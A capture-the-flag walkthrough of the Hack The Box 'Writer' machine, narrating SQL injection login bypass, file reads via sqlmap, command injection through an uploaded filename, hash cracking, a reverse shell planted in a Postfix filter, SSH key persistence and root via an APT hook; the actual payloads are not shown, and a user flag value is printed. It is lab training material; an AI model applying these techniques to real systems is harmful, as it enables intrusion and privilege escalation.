# HTB Writer Walkthrough

## Scanning

Let’s begin with a SYN port scan to find all the open ports on the target machine:

Port State Service Reason Product Version Extra Info
22 tcp open ssh syn-ack
80 tcp open http syn-ack
139 tcp open netbios-ssn syn-ack
445 tcp open microsoft-ds syn-ack

And then, let’s proceed identifying the active services on those ports:

Port State Service Reason Product Version Extra Info
22 tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
80 tcp open http syn-ack Apache httpd 2.4.41
139 tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445 tcp open netbios-ssn syn-ack Samba smbd 4.6.2

To sum up, there are four active services on the target machine: SSH, HTTP, and SMB. I can now enumerate them to find anythin interesting.

## Enumeration

### SMB

The first service I’m going to look at is SMB. SMB is a protocol used by Windows to share files and directories. It’s a very common protocol, and it’s used by many popular file sharing services. If it’s open, I can enumerate the shared directories on the target machine and access the files inside of them.

In order to do this, I use the enum4linux tool which output is reported as follows (I’ve redacted it to make it easier to read and to highlight the important bits):

So, what I can see is that the SMB domain is WRITER. I can also see that it has two users: kyle and john. The password policy has a very low minimum length requirement, so I could try to bruteforce their credentials, but I don’t want to proceed that way. Last but not least, I can see a shared folder called writer2_project, but the listing is disabled and I can’t see any of the files inside of it.

### HTTP

The second service I invesigate is the HTTP web server on the port 80. The web application are often the cause of the compromise, so I’m going to focus on it.

The application seems to be a simple blog-like platform, inside of which users can write and share some kind of content.

I can enumerate the users and the content they have written, but I’m not sure this could be useful. In the first place I’ve written down the list of the posts authors in case of future use.

First of all, I run (my best friend) fuff to enumerate the accessible directory on the target server (sorry not have taken screenshots of the output 🙏). As a result, I get the administrative directory, which seems to be very interesting, since it contains a login page.

Two approaches come to my mind: either I can bruteforce the login page based on the usernames collected from the blog posts and from the SMB enumeration, or I can try some sort of login bypass. Trying the first one, no luck.

Before using sqlmap to check if the request is vulnerable to SQL injection, I try some of the most common login bypass techniques. Luckly, the first payload I try works as a charm and I can login as an administrator:

Having access to the administration dashboard, I can have a look at the platform functionalities in order to expand my attach surface. An admin basically has the ability to create, edit and delete posts, and also to attach files to them, using a local file or a remote one. The first thing I want to focus on is the file upload feature, that could help me reach a RCE.

Playing with it I can deduce that:

1. the uploaded files needs to have a .jpg extension;
2. the uploaded files are placed at the /img/filename.jpg location;
3. changing the extension of a PHP file to .jpg, it is uploaded but its content are not executed.
Neither manual nor automated fuzzing was able to find a way to upload an executable file (again, thanks to my best friend fuff and the PayloadsAllTheThings repo).

Having no clue about how to overcame this, I decided to exploit the previous identified SQL injection vulnerability using sqlmap to enumerate the database content looking for valid credentials that could help me to login into SSH. The database contains three tables: site, stories and users.
The users table only contains one row, but its hash seems to be not crackable in the first instance.

Having no idea how to go further, I decided to try to check for DBMS permissions and (luckly) I find that the current user can access files on the local system:

In order to be sure that the permissions work as inteded, I try to dump the /etc/passwd file and it succeeds:

I need read the Apache2 virtual host configuration file in order to have a better idea of the web application’s location, but I cannot remember what its path is. To overcome this, I use a techique that LiveOverflow showed in one of his vieos (probably this one, but I’m not super-sure): to use docker containers to have an empty “clone” of the target environment to navigate it and analyze its content.

So, using the ubuntu/apache2 image and sqlmap (of course) I can dump what I need: the /etc/apache2/sites-enabled/000-default.conf file:

So there are two virtual hosts: the first one (hit by default on every route) points to the blog platform already analyzed, and the second one is a “under development” plaform which is unaccessible right now cause it has been commented out. It’s important to notice that both of them uses mod_wsgi Apache module that enables to run Python web applications. In addition, the WSGIScriptAlias directive configures the server to execute the writer.wsgi script anytime a request is received on the / route.

The writer.wsgi content (that I got via sqlmap as the previous ones) is the following:

It imports the __init__.py file which contains the main logic of a Flask application, which is the source of the previous blog platform (again, I’ve extracted the most important parts of it, since it is a huge one):

It’s quite easy to see that the post creation and editing have a really poor implementation of the remote image upload mechanism since they use the os.system function to run the mv command to move the temporary image file (created using the urlretrive function) into the static/img directory. This is not a good way to handle it, since the file name is under the user’s control and it can be used to forge a payload to execute arbitrary commands on the system.

Something important to notice is that the urlretrieve function, used to copy a remote object in a temporary location, usually doesn’t use the original object name: in fact, it generates a random one. This could make think that the application code isn’t vulnerable since the user can’t control the string used inside the os.system function. However, this is not the case. In fact, as the official documentation states, If the URL points to a local file, the object will not be copied unless filename is supplied, and the original file name is returned. Moreover, the file type check is not implemented in a good way, since it just checks if the .jpg string is present in the file name.

## Exploit

### RCE

We can chain the previous vulnerabilities together to get a complete RCE:

1. uploading a file having a bash injection payload in its name in order: this makes it possible to have a file with a command inside its name, located in a local directory (/var/www/writer.htb/writer/static/img/)
2. using the post editing end-point to modify an existing content image using the local path:
3. the resulting os.system function is:

### Looking around

The www-data user has no home directory, so it’s not usefull to get the first flag. This means that at least one lateral movement is needed to achieve the first step.

Looking around, I find that the “dev” project referenced inside the virtual host configuration is still there and is fully readable. It is a Django application not so interesting since it’s not running, but it still contains some configuration files. One of these, called settings.py, references a MySQL configuration file at /etc/mysql/my.cnf, which is also readable.

This file exposes some MySQL credentials, which can be used to navigate the dev database (which is different from the previous one dumped via sqlmap):

Now I can interact with the database and look for credentials which can be still valid somewhere. As expected, inside the auth_user table there is a valid username/password pair:

The hash prefix points out that the password is stored using the PBKDF2 algorithm. The hash is then followed by the number of iterations, the salt and the hash itself. I can try to crack it using John the Ripper, which supports that format:

Note: I had some troubles formatting the hash file, even if I’ve not found any other references around the web. The only way to make it work has been manually format the file in this way:

### User flag

The collected credentials are valid to login SSH using the kyle user. This way I’m able to read the user flag: a049fd994d4b5fb84aef8c72373e26af:

## Privilege Escalation

### John user

After running linPEAS, I notice that kyle is the only user of the filter group:

What the filter group allows to additionally do? Well, it makes it possible to edit the /etc/postfix/disclaimer:

The/etc/postfix/disclaimer file, seems to be a Postfix Filter that is executed by John everytime
a mail is sent. The file contains a disclaimer that is displayed to the user when he/she tries to send a mail:

The idea is to edit the disclaimer filter in order to add a custom piece of code that spawns a reverse shell, which will makes us able to connect as john. Since a cron job is running every 4-5 minutes to restore the original files, it’s better to write a small python script that automates the entire exploitation process:

Listening on port 1337, I can interact with the remote server using the john user:

I want have a persistent session since I don’t want to re-run the entire process in case of of connection loss. And since I’m trying a tiny tool called pwncat, I use one of its modules called linux.implant.authorized_key to install a custom SSH keypair in /home/john/.ssh/authorized_keys to be able to use SSH:

### Root user

The first thing I notice is that john belongs to the management group and considering how the previous steps developed, I start look around for resources that only that group’s users can access:

APT can be used to escalate privileges as GTFOBINS points out: [https://gtfobins.github.io/gtfobins/apt-get/]. The most common scenario is to exploit the APT hooks to execute a small set of instructions when the privileged process executes an action (e.g. apt-get update). To place a custom file inside the /etc/apt/apt.conf.d is enough to create a custom APT hook. See the documentation to investigate further. The problem here is that I haven’t the john password, so I cannot use sudo to execute apt-get update. My only chance is to find some kind of triggers that does it for me.

I have low privileges but I still need to find a process run by someone else: how can I do that? Looking on Github I findpspy which is a tool that tries to figure out which processes are run just using the low lever os call to observe the file changes (more details abount its implementation can be found here).

Running it, I see that apt-get update gets executed in loop after a certain amount of time. This is the trigger I was looking for: if I put a custom file in /etc/apt/apt.conf.d and run apt-get update it will be executed as root. Moreover, the tool output shows (I’ve marked it in blue) the processes that clear the default configuration files that I mentioned talking about the Postfix filter.

Easy, now I just write a file called 00-azraelsec inside the /etc/apt/apt.conf.d folder with the following content and I just wait for a connection:

Then I just go to /root and I read the root.txt file: